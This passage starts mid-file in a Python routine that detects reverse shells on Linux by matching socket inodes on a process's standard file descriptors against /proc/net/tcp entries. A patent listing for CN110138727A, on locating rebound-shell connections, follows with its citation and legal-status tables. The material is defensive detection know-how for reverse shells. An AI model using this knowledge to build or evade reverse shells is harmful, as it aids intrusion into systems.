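# address) and 0500000A:C350 is 10.0.0.5:50000. The inode is column 10.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0500000A:C350 0A0200C0:115C 01 00000000:00000000 00:00000000 00000000  1000        0 67890 1 0000000000000000 20 4 30 10 -1
"""


def socket_inode(link_target: str) -> Optional[int]:
    """Return the socket inode if the fd link target has the socket format, else None (A4)."""
    m = SOCKET_LINK_RE.match(link_target)
    return int(m.group(1)) if m else None


def read_fd_links(pid: int) -> Dict[int, str]:
    """Read the link targets of fds 0, 1 and 2 of a live process by PID (Linux only, A4)."""
    links: Dict[int, str] = {}
    for fd in (0, 1, 2):
        try:
            links[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
        except OSError:
            pass  # fd closed, process already gone, or no permission
    return links


def redirected_socket_inodes(fd_links: Dict[int, str]) -> Dict[int, int]:
    """Map each standard fd that points at a socket to that socket's inode."""
    found: Dict[int, int] = {}
    for fd in (0, 1, 2):
        target = fd_links.get(fd)
        ino = socket_inode(target) if target is not None else None
        if ino is not None:
            found[fd] = ino
    return found


def _decode_addr(hex_addr: str) -> Tuple[str, int]:
    """Decode 'AABBCCDD:PPPP' from /proc/net/tcp (little-endian IPv4, hex port)."""
    ip_hex, port_hex = hex_addr.split(":")
    octets = [str(int(ip_hex[i:i + 2], 16)) for i in (6, 4, 2, 0)]
    return ".".join(octets), int(port_hex, 16)


def parse_proc_net_tcp(text: str) -> Dict[int, dict]:
    """Index /proc/net/tcp rows by socket inode."""
    conns: Dict[int, dict] = {}
    for line in text.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) < 10:
            continue
        conns[int(fields[9])] = {
            "local": _decode_addr(fields[1]),
            "remote": _decode_addr(fields[2]),
            "state": fields[3],  # hex TCP state: 01 ESTABLISHED, 0A LISTEN
        }
    return conns


def find_reverse_shell_connection(fd_links: Dict[int, str], net_tcp_text: str) -> Optional[dict]:
    """A1/A2: a Bash process whose standard fd is a socket, and whose socket inode
    matches a live TCP connection, yields that connection's peer IP and port."""
    inodes = redirected_socket_inodes(fd_links)
    if not inodes:
        return None  # redirection files are not sockets: not a reverse shell by this test
    conns = parse_proc_net_tcp(net_tcp_text)
    for fd in sorted(inodes):
        conn = conns.get(inodes[fd])
        if conn is not None:
            ip, port = conn["remote"]
            return {"fd": fd, "inode": inodes[fd], "remote_ip": ip,
                    "remote_port": port, "state": conn["state"]}
    return None  # socket fd but no matching TCP row (UDP/unix socket, or already closed)


if __name__ == "__main__":
    print("suspect:", find_reverse_shell_connection(SAMPLE_FD_LINKS_SUSPECT, SAMPLE_PROC_NET_TCP))
    print("benign: ", find_reverse_shell_connection(SAMPLE_FD_LINKS_BENIGN, SAMPLE_PROC_NET_TCP))
```

Two caveats a practitioner should keep in mind. The byte order of the address column is the host's, so the decoder above is correct on little-endian machines only; IPv6 peers live in `/proc/net/tcp6` and are not covered here. Also, the inode match in A2 is racy: the fd check and the connection table read happen at different instants, so a short-lived connection can be gone by the time the table is read, which is why the last branch returns `None` rather than treating a socket fd alone as proof.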
CN201910245773.9A 2019-03-28 2019-03-28 The information searching method and device that the shell that rebounds is connected to the network Pending CN110138727A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201910245773.9A CN110138727A (en) 2019-03-28 2019-03-28 The information searching method and device that the shell that rebounds is connected to the network

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN201910245773.9A CN110138727A (en) 2019-03-28 2019-03-28 The information searching method and device that the shell that rebounds is connected to the network

Publications (1)

Publication Number Publication Date
CN110138727A true CN110138727A (en) 2019-08-16

Family

ID=67568576

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201910245773.9A Pending CN110138727A (en) 2019-03-28 2019-03-28 The information searching method and device that the shell that rebounds is connected to the network

Country Status (1)

Country Link
CN (1) CN110138727A (en)

Cited By (11)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN110535724A (en) * 2019-08-28 2019-12-03 深圳市网心科技有限公司 Application program net reading and writing method for limiting, device, electronic equipment and storage medium
CN110909349A (en) * 2019-11-14 2020-03-24 上海携程商务有限公司 detection method and system for rebound shell in docker container
CN111857965A (en) * 2020-07-28 2020-10-30 浙江军盾信息科技有限公司 Intranet threat detection method, device, equipment and computer equipment
CN111988302A (en) * 2020-08-14 2020-11-24 苏州浪潮智能科技有限公司 Method, system, terminal and storage medium for detecting rebound program
CN112165469A (en) * 2020-09-18 2021-01-01 中国船舶重工集团公司第七一四研究所 Method for detecting deformed shell
CN113449298A (en) * 2020-03-24 2021-09-28 百度在线网络技术(北京)有限公司 Detection method, device, equipment and medium for rebounding shell process
CN113515743A (en) * 2021-03-23 2021-10-19 杭州安恒信息技术股份有限公司 Identification method and device of call chain of rebound shell process and electronic device
CN114039787A (en) * 2021-11-15 2022-02-11 厦门服云信息科技有限公司 Rebound shell detection method in linux system, terminal device and storage medium
CN114722396A (en) * 2022-05-18 2022-07-08 北京长亭未来科技有限公司 Method, system and equipment for detecting rebound Shell process
WO2022222255A1 (en) * 2021-04-23 2022-10-27 杭州安恒信息技术股份有限公司 Reverse shell risk determination method, apparatus and system
CN115695405A (en) * 2021-07-28 2023-02-03 中移物联网有限公司 Equipment control method, device, control terminal, execution terminal and service terminal

Citations (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20140259105A1 (en) * 2013-03-06 2014-09-11 Massoud Alibakhsh System and method for securely accessing data through web applications
CN107423622A (en) * 2017-07-04 2017-12-01 上海高重信息科技有限公司 A kind of method and system for detecting and taking precautions against bounce-back shell
US20180077201A1 (en) * 2016-09-15 2018-03-15 Paypal, Inc. Enhanced Security Techniques for Remote Reverse Shell Prevention

Patent Citations (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US20140259105A1 (en) * 2013-03-06 2014-09-11 Massoud Alibakhsh System and method for securely accessing data through web applications
US20180077201A1 (en) * 2016-09-15 2018-03-15 Paypal, Inc. Enhanced Security Techniques for Remote Reverse Shell Prevention
CN107423622A (en) * 2017-07-04 2017-12-01 上海高重信息科技有限公司 A kind of method and system for detecting and taking precautions against bounce-back shell

Non-Patent Citations (1)

* Cited by examiner, † Cited by third party
Title
ZHANGHAOYIL: "《FREEBUF https://www.freebuf.com/articles/system/187584.html》", 1 November 2018 *

Cited By (15)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN110535724A (en) * 2019-08-28 2019-12-03 深圳市网心科技有限公司 Application program net reading and writing method for limiting, device, electronic equipment and storage medium
CN110909349A (en) * 2019-11-14 2020-03-24 上海携程商务有限公司 detection method and system for rebound shell in docker container
CN110909349B (en) * 2019-11-14 2024-03-22 上海携程商务有限公司 detection method and system for rebound shell in dock container
CN113449298B (en) * 2020-03-24 2023-09-05 百度在线网络技术(北京)有限公司 Detection method, device, equipment and medium for rebound shell process
CN113449298A (en) * 2020-03-24 2021-09-28 百度在线网络技术(北京)有限公司 Detection method, device, equipment and medium for rebounding shell process
CN111857965A (en) * 2020-07-28 2020-10-30 浙江军盾信息科技有限公司 Intranet threat detection method, device, equipment and computer equipment
CN111988302A (en) * 2020-08-14 2020-11-24 苏州浪潮智能科技有限公司 Method, system, terminal and storage medium for detecting rebound program
CN112165469A (en) * 2020-09-18 2021-01-01 中国船舶重工集团公司第七一四研究所 Method for detecting deformed shell
CN113515743A (en) * 2021-03-23 2021-10-19 杭州安恒信息技术股份有限公司 Identification method and device of call chain of rebound shell process and electronic device
CN113515743B (en) * 2021-03-23 2024-03-19 杭州安恒信息技术股份有限公司 Identification method and device for rebound shell process call chain and electronic device
WO2022222255A1 (en) * 2021-04-23 2022-10-27 杭州安恒信息技术股份有限公司 Reverse shell risk determination method, apparatus and system
CN115695405A (en) * 2021-07-28 2023-02-03 中移物联网有限公司 Equipment control method, device, control terminal, execution terminal and service terminal
CN114039787B (en) * 2021-11-15 2023-12-22 厦门服云信息科技有限公司 Rebound shell detection method in linux system, terminal equipment and storage medium
CN114039787A (en) * 2021-11-15 2022-02-11 厦门服云信息科技有限公司 Rebound shell detection method in linux system, terminal device and storage medium
CN114722396A (en) * 2022-05-18 2022-07-08 北京长亭未来科技有限公司 Method, system and equipment for detecting rebound Shell process

Similar Documents

Publication Publication Date Title
CN110138727A (en) The information searching method and device that the shell that rebounds is connected to the network
US11681803B2 (en) Malware identification using multiple artificial neural networks
CN110166420A (en) Rebound shell blocking-up method and device
Rastogi et al. Are these Ads Safe: Detecting Hidden Attacks through the Mobile App-Web Interfaces.
CN105320883B (en) File security loads implementation method and device
JP6441957B2 (en) Systems, devices, and methods that automatically validate exploits on suspicious objects and highlight display information associated with the proven exploits
CN104517054B (en) Method, device, client and server for detecting malicious APK
EP3371953B1 (en) System and methods for detecting domain generation algorithm (dga) malware
US20130086688A1 (en) Web application exploit mitigation in an information technology environment
CN110099044A (en) Cloud Host Security detection system and method
CN103617395A (en) Method, device and system for intercepting advertisement programs based on cloud security
CN105631341B (en) Blind detection method and device for vulnerability
CN110417768B (en) Botnet tracking method and device
JP6349244B2 (en) In-vehicle network testing equipment
JP2019536158A (en) Method and system for verifying whether detection result is valid or not
CN106250761B (en) Equipment, device and method for identifying web automation tool
CN111177727A (en) Vulnerability detection method and device
CN105631321B (en) A kind of detection method and device of virtual machine process information
US9881155B2 (en) System and method for automatic use-after-free exploit detection
CN105592105B (en) Guarantee the asynchronous system Network Access Method and device of safety
CN104484608A (en) Application-based message processing method and application-based message processing device
CN114629686A (en) Vulnerability attack detection method and device
CN113709130A (en) Risk identification method and device based on honeypot system
KR20220073657A (en) Image-based malicious code analysis method and apparatus and artificial intelligence-based endpoint detection and response system using the same
EP2815350A2 (en) Methods, systems, and media for inhibiting attacks on embedded devices

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
RJ01 Rejection of invention patent application after publication

Application publication date: 20190816